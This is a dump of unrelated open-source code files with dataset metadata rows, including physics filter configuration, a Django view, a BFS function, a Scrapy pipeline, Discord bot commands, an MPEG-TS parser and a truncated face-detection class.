    cutString+= " && abs("
    cutString+= primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
    cutString+=".eta) < "
    cutString+= str(primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtaMax)
    cutString+=" ) > 0"
    topSequence += CutAlg(electronFilterName,
                          Cut=cutString)
    filtersToBookkeep+=["VH_DV_ElectronFilter"]
    ## topSequence += ElectronFilter(electronFilterName)
    ## topSequence.VH_DV_ElectronFilter.cutEtMin = primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtMin
    ## topSequence.VH_DV_ElectronFilter.cutEtaMax = primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtaMax
    ## topSequence.VH_DV_ElectronFilter.cutIsEM=primRPVLLDESDM.VH_DV_electronFilterFlags.cutIsEM
    ## topSequence.VH_DV_ElectronFilter.cutAuthor=primRPVLLDESDM.VH_DV_electronFilterFlags.cutAuthor
    ## topSequence.VH_DV_ElectronFilter.electronCollectionName=primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
    electronFilterName = 'VH_DV_DiElectronFilter'
    cutString="count( "
    cutString+= primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
    cutString+=".pt > "
    cutString += str(primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtMin)
    cutString+= " && abs("
    cutString+= primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
    cutString+=".eta) < "
    cutString+= str(primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtaMax)
    cutString+=" ) > 1"
    topSequence += CutAlg(electronFilterName,
                          Cut=cutString)
    filtersToBookkeep+=["VH_DV_DiElectronFilter"]
    ## topSequence += ElectronFilter(electronFilterName)
    ## topSequence.VH_DV_DiElectronFilter.cutEtMin = primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtMin
    ## topSequence.VH_DV_DiElectronFilter.cutEtaMax = primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutEtaMax
    ## topSequence.VH_DV_DiElectronFilter.cutIsEM=primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutIsEM
    ## topSequence.VH_DV_DiElectronFilter.cutAuthor=primRPVLLDESDM.VH_DV_DielectronFilterFlags.cutAuthor
    ## topSequence.VH_DV_DiElectronFilter.electronCollectionName=primRPVLLDESDM.VH_DV_DielectronFilterFlags.electronCollectionName
    ## topSequence.VH_DV_DiElectronFilter.minNumberPassed = 2
    combinedOfflineFilterName = "VH_DV_CombinedWOfflineFilter"
    topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
    cmdstring = "VH_DV_ElectronFilter and VH_DV_JetMetFilter"
    topSequence.VH_DV_CombinedWOfflineFilter.cmdstring=cmdstring
    filtersToBookkeep+=[combinedOfflineFilterName]
    combinedOfflineFilterName = "VH_DV_CombinedZOfflineFilter"
    topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
    cmdstring = "VH_DV_DiElectronFilter and VH_DV_JetFilter"
    topSequence.VH_DV_CombinedZOfflineFilter.cmdstring=cmdstring
    filtersToBookkeep+=[combinedOfflineFilterName]
    combinedOfflineFilterName = "VH_DV_CombinedEgammaOfflineFilter"
    topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
    cmdstring = "VH_DV_CombinedWOfflineFilter or VH_DV_CombinedZOfflineFilter"
    topSequence.VH_DV_CombinedEgammaOfflineFilter.cmdstring=cmdstring
    filtersToBookkeep+=[combinedOfflineFilterName]

########### combine the trigger and offline filters
VH_DVCombinedFilter=LogicalFilterCombiner("VH_DVCombinedFilter")
if rec.triggerStream() == "Muons":
    topSequence+=VH_DVCombinedFilter
    topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedMuonsOfflineFilter"
elif rec.triggerStream() == "Egamma":
    topSequence+=VH_DVCombinedFilter
    topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedEgammaOfflineFilter"
else:
    # Inclusive stream "": both the muon and egamma offline chains were
    # scheduled above, so OR them together before ANDing with the triggers.
    combinedOfflineFilterName = "VH_DV_CombinedEgammaMuonsOfflineFilter"
    topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
    cmdstring = "VH_DV_CombinedEgammaOfflineFilter or VH_DV_CombinedMuonsOfflineFilter"
    topSequence.VH_DV_CombinedEgammaMuonsOfflineFilter.cmdstring=cmdstring
    filtersToBookkeep+=[combinedOfflineFilterName]
    topSequence+=VH_DVCombinedFilter
    topSequence.VH_DVCombinedFilter.cmdstring="VH_DV_CombinedTriggerFilter and VH_DV_CombinedEgammaMuonsOfflineFilter"

########### add this to the global top filter
if topCmdString.__len__() > 0:
    topCmdString+=" or "
    pass
topCmdString+="VH_DVCombinedFilter"
filtersToBookkeep+=["VH_DVCombinedFilter"]
| rushioda/PIXELVALID_athena | athena/PhysicsAnalysis/SUSYPhys/LongLivedParticleDPDMaker/share/PhysDESDM_VH_DV.py | PhysDESDM_VH_DV.py | py | 9,185 | python | en | code | 1 | github-code | 13 |
7159983981 | from django.http import HttpResponse
from django.shortcuts import render
#from conf import access_token,refresh_token
from codechef_mayukh45.MAIN import get_college
import sys
#username = ""
#friends = []
# Module-level state mutated via ``global`` inside index(); 0 means
# "not looked up yet".
# NOTE(review): shared mutable globals are not safe across concurrent
# requests -- confirm this app is only deployed single-threaded.
own_college = 0
friends_college = 0
import time
def index(request):
    """Render the creation page: look up the requesting user's college and,
    on POST, add a new friend (with their college) to the on-disk store.

    Query params: ``username`` (GET).  Form fields: ``new_friend`` (POST).
    """
    global own_college
    global friends_college
    new_friend = ""
    friends = {}
    username = str(request.GET.get('username'))
    # print("username creation "+str(username))
    if len(str(username)) > 0 and str(username) != "None":
        own_college = get_college(str(username))
    # Re-import the on-disk "database" module fresh each request; deleting it
    # from sys.modules forces the next import to re-read the rewritten file.
    # NOTE(review): persisting state by rewriting database.py is fragile
    # (not concurrency-safe, and importing it executes arbitrary code).
    from database import data
    del sys.modules['database']
    #print(str(data))
    keys = list(data.keys())
    if keys.count(username)==0 and username!="None":
        # First time this username is seen: create an empty friends record.
        data[username]={'friends':{},"college":own_college}
        keys.append(username)
    if request.method=="POST":
        new_friend = str(request.POST.get('new_friend'))
        print(new_friend)
        if len(str(new_friend))>0 and str(new_friend)!="None" and str(username)!=("None"):
            #print("LOL"*10)
            #print(username)
            friends_college = get_college(new_friend)
            # -1 appears to act as a "lookup failed" marker from
            # get_college() -- TODO confirm against its implementation.
            if friends_college != -1 and own_college!=-1:
                data[username]['friends'][str(new_friend)]=friends_college
            #print(data)
            f = open('database.py','w')
            f.write("data = "+str(data))
            f.close()
    # print("*"*100)
    # print("new_friend"+str(new_friend))
    # print(str(data))
    if keys.count(username)>0:
        # print(username + "io")
        friends = list(data[username]['friends'].keys())
    null = False
    # NOTE(review): ``and`` binds tighter than ``or`` here, so this reads as
    # A or (B and C) -- confirm that is the intended grouping.
    if str(username) == "None" or len(str(username))==0 and friends_college!=-1:
        null = True
    #print("creation"+str(username))
    # print("friends "+str(friends))
    context = {'friends' : friends,'username':username,'own_college':own_college,'friend_college':friends_college,"null":null}
    return render(request,"creation.html", context)
| mayukh45/Ranklist_App | codechef_mayukh45/creation/views.py | views.py | py | 1,999 | python | en | code | 0 | github-code | 13 |
1590015 | from collections import deque
def bfs(graph: dict[int, list[int]], start: int) -> list[int]:
    """Breadth-first traversal from ``start``.

    Returns every reachable vertex in the order it is first discovered.
    With V vertices and E edges this runs in O(V + E) time and uses
    O(V) extra space.
    """
    order: list[int] = []
    discovered = {start}
    pending = deque([start])
    while pending:
        vertex = pending.popleft()
        order.append(vertex)
        for neighbour in graph[vertex]:
            if neighbour not in discovered:
                discovered.add(neighbour)
                pending.append(neighbour)
    return order
# Demo: a small undirected graph given as adjacency lists.
G = {
    1: [2, 3],
    2: [1, 3, 6, 7],
    3: [1, 2, 4, 5],
    4: [3, 5],
    5: [3, 4],
    6: [2, 7],
    7: [2, 6],
}

print(bfs(G, 1))  # [1, 2, 3, 6, 7, 4, 5]
print(bfs(G, 3))  # [3, 1, 2, 4, 5, 6, 7]
| ironwolf-2000/Algorithms | Graphs/Traversals/BFS/bfs.py | bfs.py | py | 708 | python | en | code | 2 | github-code | 13 |
2244821279 | """
Overview
========
This plugin attempt to set the actual project attribute
for the current AreaVi instance. It tries to find
project folders like .git, .svn, .hg or a ._ that's
a vy project file.
"""
from os.path import exists, dirname, join
from vyapp.stderr import printd
def get_sentinel_file(path, *args):
    """
    Walk up from *path* towards the filesystem root and return the first
    ancestor directory containing one of the sentinel entries in *args*
    (e.g. '.git', '.svn').

    Returns '' when no ancestor holds any sentinel, or when no sentinels
    are given (the original looped forever on empty *args* and, at the
    root, only checked the first sentinel before giving up).
    """
    tmp = dirname(path)
    while True:
        # Test every sentinel at this level before moving up.
        for ind in args:
            if exists(join(tmp, ind)):
                return tmp
        if tmp == dirname(tmp):
            # Reached the filesystem root without finding a sentinel.
            return ''
        tmp = dirname(tmp)
class Project:
    """AreaVi plugin: derive the project root for the current buffer by
    walking up from the buffer's file until a sentinel entry is found."""

    # Entries that mark a project root; '._' marks a vy project file.
    sentinels = ('.git', '.svn', '.hg', '._')

    def __init__(self, area):
        self.area = area
        # Recompute the project root whenever the buffer is loaded or saved.
        area.install('fstmt', (-1, '<<LoadData>>', self.set_path),
                     (-1, '<<SaveData>>', self.set_path))

    @classmethod
    def c_sentinels(cls, *sentinels):
        # Replace the class-wide sentinel tuple (affects all instances).
        cls.sentinels = sentinels
        printd('Project - Setting sentinels = ', cls.sentinels)

    def set_path(self, event):
        """
        Set the project root automatically.
        """
        self.area.project = get_sentinel_file(
            self.area.filename, *Project.sentinels)
        printd('Project - Setting project path = ', self.area.project)

# vy plugin entry point: the plugin system instantiates ``install``.
install = Project
| vyapp/vy | vyapp/plugins/project.py | project.py | py | 1,236 | python | en | code | 1,145 | github-code | 13 |
23015863407 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class WeatherPipeline(object):
    """Persist scraped weather items to ``result.txt``, one line per item."""

    def open_spider(self, spider):
        # Create/truncate the output file in binary mode when the spider starts.
        self.f = open(r"result.txt", "wb")

    def process_item(self, item, spider):
        # The item fields are lists; concatenating them and calling str()
        # yields "['a', 'b', ...]", so the list syntax is stripped below.
        joined = str(item['date'] + item['day'] + item['weather'] +
                     item['Minimum_temperature'] + item['Maxmum_temperature'] +
                     item['wind_direction']) + "\n"
        cleaned = joined.translate(str.maketrans('', '', "'[]"))
        self.f.write(cleaned.encode())
        return item

    def close_spider(self, spider):
        # Close the output file when the spider finishes.
        print("文件关闭")
        self.f.close()
| leng-bing-bing/homework | 6/weather/weather/pipelines.py | pipelines.py | py | 1,045 | python | en | code | 1 | github-code | 13 |
70161175699 | from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Type, Tuple
import discord
from difflib import get_close_matches
from disputils import BotMultipleChoice
class OSBcmd(ABC):
    """
    Command pattern interface: every bot command implements execute().
    """

    @abstractmethod
    async def execute(self, **kwargs):
        """Run the command; concrete subclasses must override this."""
class Ping(OSBcmd):
    """
    Liveness check: replies with a fixed message.
    """

    async def execute(self, ctx) -> None:
        await ctx.send("pog")
class Add(OSBcmd):
    """
    Allows users to add themselves to a role.

    Users may only self-assign roles whose permission value equals
    ``perm_num`` -- this prevents joining admin-level roles.  ``role``
    arrives already resolved to a discord Role (or None when it does
    not exist).
    """

    async def execute(self, ctx, perm_num, role: discord.Role) -> None:
        # Fix: the original re-assigned ``user = ctx.message.author`` a
        # second time in the else-branch; the duplicate lookup is removed.
        # The "dose not exist" typo in the user-facing message is also fixed.
        user = ctx.message.author
        if role is None:
            await ctx.send(f'That role does not exist {user.mention}')
        elif role.permissions.value != perm_num:
            await ctx.send('You do not have permission to add this role')
        elif role in user.roles:
            await ctx.send(f"You cannot add a role you already have {user.mention}")
        else:
            await user.add_roles(role)
            await ctx.send(f'Added {role} to {user.mention}')
class Remove(OSBcmd):
    """
    Allows users to remove themselves from a role (one whose permission
    value equals ``perm_num``, i.e. a self-assignable role).

    Unlike Add, ``role`` arrives as a name string and is resolved against
    the guild's roles first.
    """

    async def execute(self, ctx, perm_num, role) -> None:
        role = discord.utils.get(ctx.guild.roles, name=role)
        user = ctx.message.author
        if role is None:
            # Typo fix: "dose" -> "does" in the user-facing message.
            await ctx.send(f'That role does not exist {user.mention}')
        elif role.permissions.value != perm_num:
            await ctx.send('You do not have permission to remove this role')
        elif role not in user.roles:
            await ctx.send(f"You cannot remove a role you don't have {user.mention}")
        else:
            await user.remove_roles(role)
            await ctx.send(f"Removed {role} from {user.mention}")
class Search:
    """
    Allow users to search roles by name and add themselves via a choice box.
    """
    # NOTE(review): unlike the other commands this class does not inherit
    # from OSBcmd -- confirm whether that is intentional.

    async def execute(self, ctx, perm_number, role):
        user = ctx.message.author
        roles = ctx.guild.roles
        # Only self-assignable roles (matching permission value) are searchable.
        roles = [i for i in roles if i.permissions.value == perm_number and i.name != '@everyone']
        role_names = get_close_matches(role, [i.name for i in roles])
        if not role_names:
            await ctx.send(f"Could not find any roles close to that name... {user.mention}")
            return None
        # NOTE(review): difflib.get_close_matches defaults to n=3 results,
        # so this trim-to-5 guard can never fire -- confirm intent.
        if len(role_names) > 5:
            del role_names[5:]
        multiple_choice = BotMultipleChoice(ctx, role_names, "Search Results:")
        choice = await multiple_choice.run()
        choice = choice[0]
        if choice:
            # Resolve the chosen name back to the Role object.
            for i in roles:
                if choice == i.name:
                    choice = i
                    break
        else:
            # User cancelled / made no selection.
            await multiple_choice.quit(f"Sorry you did not see the class you were looking for {user.mention}!")
            return None
        await multiple_choice.quit()
        return choice
| jarrett-m/OnStudy_Bot | source/osb_commands.py | osb_commands.py | py | 3,281 | python | en | code | 0 | github-code | 13 |
5832468796 | #!/usr/bin/env python
# coding: utf-8
# This reads from HD5 files and sends over network.
# This file sends drone position data over a server as x, y, z by sending at the right timestamp.
# Change the HOST and PORT variables accordingly.
import h5py
import numpy as np
import math
import struct
import time
import socket
import json
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--HOST", help="Host to stream the position data from")
parser.add_argument("--PORT", help="Port to stream the position data from")
args = parser.parse_args()
HOST = args.HOST
PORT = args.PORT
if args.HOST == None:
HOST = 'LOCALHOST'
if args.PORT == None:
PORT = 50008
try:
PORT = int(PORT)
except ValueError:
print("PORT variable must be an integer")
print("Exitting now...")
exit()
print("Reading in data...")
f = h5py.File('RunData.h5', 'r')
x = f.keys()
pos_data = f["posData"]
print("Connecting...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.bind((HOST, PORT))
s.connect((HOST, PORT))
offset = pos_data[0][0]
start = time.time()
print("Sending")
for i in range(len(pos_data)):
while(time.time() - start < pos_data[i][0] - offset):
time.sleep(0.1)
# sending message in format [label]:[timestamp]:data\n
xyz = "Drone:" + str(pos_data[i][0]) + ":" + str(pos_data[i][1]) + "," + str(pos_data[i][2]) + "," + str(pos_data[i][3]) + "\n"
print("Num: " + str(i) + ": "+ xyz)
s.send(xyz.encode())
s.close()
f.close()
| immersive-command-system/RadiationVisualization | LBL/GeneratePosData.py | GeneratePosData.py | py | 1,666 | python | en | code | 3 | github-code | 13 |
10844205105 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assignment in BMP course - Program Mapping Table parser
Author: Jakub Lukac
E-mail: xlukac09@stud.fit.vutbr.cz
Created: 22-10-2019
Testing: python3.6
"""
import sys
from descriptor import parse_descriptors
from psi import PSI
class PMT(PSI):
    """MPEG-TS Program Map Table parser.

    Parses the PSI payload into: ``pcr_pid``, ``program_descriptors`` and,
    per elementary stream, ``stream_type`` / ``elementary_pids`` /
    ``elementary_descriptors``.  Malformed reserved/unused bits are
    reported to stderr but parsing continues.
    """

    def __init__(self, data):
        # parse program-specific information frame
        super().__init__(data)
        if not self.section_syntax_indicator:
            print("PMT Error: Program", format(self.id, "#06x"), "Section syntax indicator bit not set to 1.",
                  file=sys.stderr)
        if self.private_bit:
            print("PMT Error: Program", format(self.id, "#06x"), "Private bit not set to 0.", file=sys.stderr)
        self.__parse_pmt_table(self.table_data)

    def __parse_pmt_table(self, data):
        """Walk the table body byte-by-byte; ``position_indicator`` is the
        current read offset into ``data``."""
        position_indicator = 0
        # 3 bits reserved bits
        reserved = (data[position_indicator] & 0xe0) >> 5
        if reserved != 0x07:
            print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x07.",
                  file=sys.stderr)
        # 13 bits PCR PID
        self.pcr_pid = int.from_bytes(data[position_indicator:position_indicator + 2],
                                      byteorder="big") & 0x1fff
        position_indicator += 2
        # 4 bits reserved bits
        reserved = (data[position_indicator] & 0xf0) >> 4
        if reserved != 0x0f:
            print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x0f.",
                  file=sys.stderr)
        # 2 bits program info length unused bits
        unused_bits = (data[position_indicator] & 0x0c) >> 2
        if unused_bits != 0x00:
            print("PMT Error: Program", format(self.id, "#06x"), "Section length unused bits not set to 0.",
                  file=sys.stderr)
        # 10 bits program info length
        program_info_length = int.from_bytes(data[position_indicator:position_indicator + 2], byteorder="big") & 0x03ff
        position_indicator += 2
        # variable bits read program descriptors
        self.program_descriptors = parse_descriptors(
            data[position_indicator:position_indicator + program_info_length])
        position_indicator += program_info_length
        # elementary stream info loop
        self.stream_type = []
        self.elementary_pids = []
        self.elementary_descriptors = []
        while position_indicator < len(data):
            # 8 bits elementary stream type
            self.stream_type.append(data[position_indicator])
            position_indicator += 1
            # 3 bits reserved bits
            reserved = (data[position_indicator] & 0xe0) >> 5
            if reserved != 0x07:
                print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x07.", file=sys.stderr)
            # 13 bits elementary stream pid
            self.elementary_pids.append(int.from_bytes(data[position_indicator:position_indicator + 2],
                                                       byteorder="big") & 0x1fff)
            position_indicator += 2
            # 4 bits reserved bits
            reserved = (data[position_indicator] & 0xf0) >> 4
            if reserved != 0x0f:
                print("PMT Error: Program", format(self.id, "#06x"), "Reserved bits not set to 0x0f.",
                      file=sys.stderr)
            # 2 bits program info length unused bits
            unused_bits = (data[position_indicator] & 0x0c) >> 2
            if unused_bits != 0x00:
                print("PMT Error: Program", format(self.id, "#06x"), "Section length unused bits not set to 0.",
                      file=sys.stderr)
            # 10 bits elementary stream info length
            elementary_info_length = int.from_bytes(data[position_indicator:position_indicator + 2],
                                                    byteorder="big") & 0x03ff
            position_indicator += 2
            # variable bits read descriptors
            self.elementary_descriptors.append(
                parse_descriptors(data[position_indicator:position_indicator + elementary_info_length]))
            position_indicator += elementary_info_length

    def __str__(self):
        # Human-readable dump: program number plus the parsed stream lists.
        pmt_str = super().__str__()
        pmt_str += "Program number: {self.id:#06x}\n" \
                   "Stream type: [".format(self=self) \
                   + ", ".join([format(id, "#04x") for id in self.stream_type]) + \
                   "]\n" \
                   "ES PIDs: [" \
                   + ", ".join([format(id, "#06x") for id in self.elementary_pids]) + \
                   "]\n"
        return pmt_str
| cubolu/School-Projects | Python/BMS/dvb-t/pmt.py | pmt.py | py | 4,701 | python | en | code | 0 | github-code | 13 |
14530341692 | import pandas as pd
import networkx as nx
import numpy as np
import time
def build_year(year):
    """Build the per-(defense, player) matchup table for one season.

    Reads pruned_data/pruned_data_<year>.csv, adds per-minute stats, then
    writes df_possibles/df_possible_<year>.csv with one row per possible
    defense/player pair (times_played plus mean per-minute stats, 0 when
    they never met).

    NOTE(review): the iterrows loop filters df_actual once per pair, i.e.
    O(pairs x rows) -- a groupby + merge would be far faster.
    """
    print('start')
    file_read = 'pruned_data/pruned_data_{}.csv'.format(year)
    df_actual = pd.read_csv(file_read)
    # reformat so triangle generator can differentiate
    df_actual['defense'] = 'Defense_' + df_actual['opp_id']
    #change this so its the same as toy example
    df_actual.columns = ['player' if x == 'player_id' else x for x in df_actual.columns]
    # add per min stats (guarding against division by zero minutes)
    stats = ['pts', 'trb', 'ast', 'blk', 'stl']
    for stat in stats:
        new_col = stat + '_per_min'
        df_actual[new_col] = df_actual.apply(lambda row: 0 if row['mp'] == 0 else row[stat] / row['mp'], axis=1)
    # build df_possible
    # initial player-defense pairs (full cross product)
    defense_list = []
    player_list = []
    print('build combos')
    for defense in df_actual['defense'].unique():
        for player in df_actual['player'].unique():
            defense_list.append(defense)
            player_list.append(player)
    data_dict = {'defense' : defense_list, 'player' : player_list}
    df_possible = pd.DataFrame(data=data_dict)
    # real results from df_actual -> df_possible
    # apply above tests to all rows
    stats_per_min = ['pts_per_min', 'trb_per_min', 'ast_per_min', 'blk_per_min', 'stl_per_min']
    print('{} num of rows: {}'.format(year, len(df_possible)))
    for index, row in df_possible.iterrows():
        # Progress heartbeat every 1000 rows.
        if index % 1000 == 0:
            print('index: {}'.format(index))
            print(time.time())
        df_filtered = df_actual[(df_actual['player'] == row['player']) & (df_actual['defense'] == row['defense'])]
        df_possible.loc[index, 'times_played'] = len(df_filtered)
        if len(df_filtered) == 0:
            for stat in stats_per_min:
                df_possible.loc[index, stat] = 0.0
        else:
            for stat in stats_per_min:
                df_possible.loc[index, stat] = df_filtered[stat].mean()
    # save csv
    file_name = 'df_possibles/df_possible_{}.csv'.format(year)
    df_possible.to_csv(file_name, index=False)
# Seasons to process; each produces df_possibles/df_possible_<year>.csv.
years = [2015, 2016, 2017]
for year in years:
    build_year(year)
| abeard1/IndependentStudy | src/build_df_possibles.py | build_df_possibles.py | py | 2,229 | python | en | code | 0 | github-code | 13 |
6991250955 | import pandas as pd
import numpy as np
data = pd.read_csv("raions.csv")
cat = ["young_", "work_", "ekder_"]
man = ["all", "male", "female"]
tar = "raion_popul"
for i in cat:
for j in man:
data[i + j] = data[i + j] / data[tar]
data.to_csv("raions_popul_percentaged.csv", index=None)
| ZiyaoLi/KaggleSberbank | codes_and_preprocessed_data/preproc_&_feature_eng_codes/cnt2pct_raion_popul.py | cnt2pct_raion_popul.py | py | 298 | python | en | code | 0 | github-code | 13 |
27563472500 | #############################################
# CSC 242 Section 602 Spring 2017
# Lab 3: User-defined classes
#
# LEXUS NGUYEN
#
# Fill in the 4 methods below. Also,
# be sure to define the distance method
# in the Point class (in the point.py file)
#############################################
import math

from point import *
class Triangle:
    """A triangle defined by three corner Points (p1, p2, p3)."""

    # make a triangle whose corners are defined by the points p1, p2, and p3
    def __init__(self, p1, p2, p3):
        self.p1 = p1
        self.p2 = p2
        self.p3 = p3
        # Pre-compute the three side lengths once.
        self.p1top2 = p1.distance(p2)
        self.p2top3 = p2.distance(p3)
        self.p3top1 = p3.distance(p1)

    # this method is complete. You do not need to write or modify it.
    def __str__(self):
        return '({},{},{})'.format(self.p1, self.p2, self.p3)

    def is_triangle(self):
        """Return True when the corners form a proper triangle: every side
        must be strictly shorter than the sum of the other two (collinear
        points fail the strict inequality)."""
        a, b, c = self.p1top2, self.p2top3, self.p3top1
        return a + b > c and b + c > a and c + a > b

    def perimeter(self):
        """Return the perimeter (also cached as self.p for compatibility)."""
        self.p = self.p1top2 + self.p2top3 + self.p3top1
        return self.p

    def area(self):
        """Return the area via Heron's formula.

        Bug fix: the original read self.p, which only exists after
        perimeter() had been called, so area() on its own raised
        AttributeError.  The semi-perimeter is now computed directly.
        """
        s = 0.5 * self.perimeter()
        return math.sqrt(s * (s - self.p1top2) * (s - self.p2top3) * (s - self.p3top1))
| nguyenlexus/work | CSC242/triangle.py | triangle.py | py | 1,764 | python | en | code | 0 | github-code | 13 |
37502785864 | """
@author: Hayeon Lee
2020/02/19
Script for downloading, and reorganizing CUB few shot
Run this file as follows:
python get_data.py
"""
import pickle
import os
import numpy as np
from tqdm import tqdm
import requests
import tarfile
from PIL import Image
import glob
import shutil
import pickle
def download_file(url, filename):
    """
    Helper method handling downloading large files from `url`
    to `filename`. Returns a pointer to `filename`.

    Fixes vs. the original: the response and the tqdm progress bar are
    closed deterministically, and a missing Content-Length header no
    longer raises KeyError (tqdm just runs without a known total).
    """
    chunk_size = 1024
    with requests.get(url, stream=True) as r:
        total = int(r.headers.get('Content-Length', 0))
        with open(filename, 'wb') as f, tqdm(unit="B", total=total) as pbar:
            for chunk in r.iter_content(chunk_size=chunk_size):
                if chunk:  # filter out keep-alive new chunks
                    pbar.update(len(chunk))
                    f.write(chunk)
    return filename
if not os.path.exists("CUB_200_2011.tgz"):
print("Downloading CUB_200_2011.tgz\n")
download_file('http://www.vision.caltech.edu/visipedia-data/CUB-200-2011/CUB_200_2011.tgz','CUB_200_2011.tgz')
print("Downloading done.\n")
else:
print("Dataset already downloaded. Did not download twice.\n")
if not os.path.exists("CUB_200_2011"):
tarname = "CUB_200_2011.tgz"
print("Untarring: {}".format(tarname))
tar = tarfile.open(tarname)
tar.extractall()
tar.close()
print("Removing original CUB_200_2011.tgz")
else:
print("CUB_200_2011 folder already exists. Did not untarring twice\n")
print("Generate preprocessed valid.npy data")
with open('val_cls.pkl', 'rb') as f:
data = pickle.load(f)
x_lst = [[] for _ in range(len(data))]
for c, x_per_cls in enumerate(tqdm(data)):
for x_path in x_per_cls:
img = Image.open(
os.path.join('CUB_200_2011', 'images', x_path)).resize((84, 84))
img = np.array(img)
if img.shape == (84, 84, 3):
x_lst[c].append(img / 255.0)
x_lst[c] = np.array(x_lst[c])
np.save('valid.npy', np.array(x_lst))
print("Done")
print("Generate preprocessed test.npy data")
with open('test_cls.pkl', 'rb') as f:
data = pickle.load(f)
x_lst = [[] for _ in range(len(data))]
for c, x_per_cls in enumerate(tqdm(data)):
for x_path in x_per_cls:
img = Image.open(
os.path.join('CUB_200_2011', 'images', x_path)).resize((84, 84))
img = np.array(img)
if img.shape == (84, 84, 3):
x_lst[c].append(img / 255.0)
x_lst[c] = np.array(x_lst[c])
np.save('test.npy', np.array(x_lst))
print("Done")
# print("Removing original CUB_200_2011")
# os.remove('CUB_200_2011.tgz')
# shutil.rmtree('CUB_200_2011', ignore_errors=True)
# os.remove('attributes.txt')
| YuanWanglll/l2b | data/cub/get_data.py | get_data.py | py | 2,652 | python | en | code | null | github-code | 13 |
9984220361 | # -*- coding: utf-8 -*-
###############################################
#created by : lxy
#Time: 2018/06/28 14:09
#project: Face recognize
#company: Senscape
#rversion: 0.1
#tool: python 2.7
#modified:
#description opencv face detector
####################################################
import os
import sys
import cv2
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
sys.path.append('.')
sys.path.append('/home/lxy/caffe/python')
os.environ['GLOG_minloglevel'] = '2'
import tools_matrix as tools
import caffe
sys.path.append(os.path.join(os.path.dirname(__file__),'../configs'))
from config import cfgs as config
class FaceDetector_Opencv(object):
    """Haar-cascade face detector wrapper around cv2.CascadeClassifier,
    with helpers for drawing boxes and labels on images."""

    def __init__(self,model_path):
        # model_path: path to an OpenCV Haar cascade XML file.
        self.detection_model = cv2.CascadeClassifier(model_path)
        print("load model over")

    def detectFace(self,img):
        """Detect faces in a BGR image; returns an Nx4 array of
        (x1, y1, x2, y2) corner boxes, or [] when nothing is found."""
        gray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        #rgb_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        faces = self.detection_model.detectMultiScale(gray_image, 1.3, 5,minSize=(130,130),maxSize=(900,900))
        #results = detector.detect_face(img)
        boxes = []
        for face_coordinates in faces:
            boxes.append(face_coordinates)
        if len(boxes)>0:
            boxes = np.asarray(boxes)
            # Convert (x, y, w, h) from detectMultiScale to corner format.
            boxes[:,2] = boxes[:,0] +boxes[:,2]
            boxes[:,3] = boxes[:,1] +boxes[:,3]
            return boxes
        else:
            return []

    def draw_box(self,img,box,color=(255,0,0)):
        # NOTE(review): this treats ``box`` as (x, y, w, h) while
        # detectFace() returns corner boxes -- confirm which format the
        # callers pass in.
        #(row,col,cl) = np.shape(img)
        #b = board_img(box,col,row)
        cv2.rectangle(img, (int(box[0]), int(box[1])), (int(box[2]+box[0]), int(box[3]+box[1])), color)

    def add_label(self,img,bbox,label,color=(255,0,0)):
        """Draw one rectangle plus the text ``label`` per row of ``bbox``
        (rows treated as x, y, w, h); the label is placed above the box,
        or below it when there is no room at the top."""
        num = bbox.shape[0]
        font = cv2.FONT_HERSHEY_COMPLEX_SMALL
        font_scale =1
        thickness = 1
        for i in range(num):
            x1,y1,w,h = int(bbox[i,0]),int(bbox[i,1]),int(bbox[i,2]),int(bbox[i,3])
            x2 = x1 + w
            y2 = y1 + h
            cv2.rectangle(img,(x1,y1),(x2,y2),color,1)
            #score_label = str('{:.2f}'.format(bbox[i,4]))
            score_label = label
            size = cv2.getTextSize(score_label, font, font_scale, thickness)[0]
            if y1-int(size[1]) <= 0:
                #cv2.rectangle(img, (x1, y2), (x1 + int(size[0]), y2+int(size[1])), color)
                cv2.putText(img, score_label, (x1,y2+size[1]), font, font_scale, color, thickness)
            else:
                #cv2.rectangle(img, (x1, y1-int(size[1])), (x1 + int(size[0]), y1), (255, 0, 0))
                cv2.putText(img, score_label, (x1,y1), font, font_scale, color, thickness)
class MTCNNDet(object):
    """Three-stage MTCNN face detector (PNet -> RNet -> ONet) on Caffe.

    ``self.test``/``self.load`` select between two sets of model files
    with different layer names ('12net'/'24net'/'48net' vs
    'PNet'/'RNet'/'Onet') and different input axis conventions.
    Returned rectangles come from tools.filter_face_48net (boxes plus
    landmark points).
    """

    def __init__(self,min_size,threshold,model_dir):
        # threshold: per-stage score cutoffs [pnet, rnet, onet].
        self.test = 1
        self.load = 1
        self.load_model(model_dir)
        self.min_size = min_size
        self.threshold = threshold
        caffe.set_device(0)
        caffe.set_mode_gpu()

    def load_model(self,model_dir):
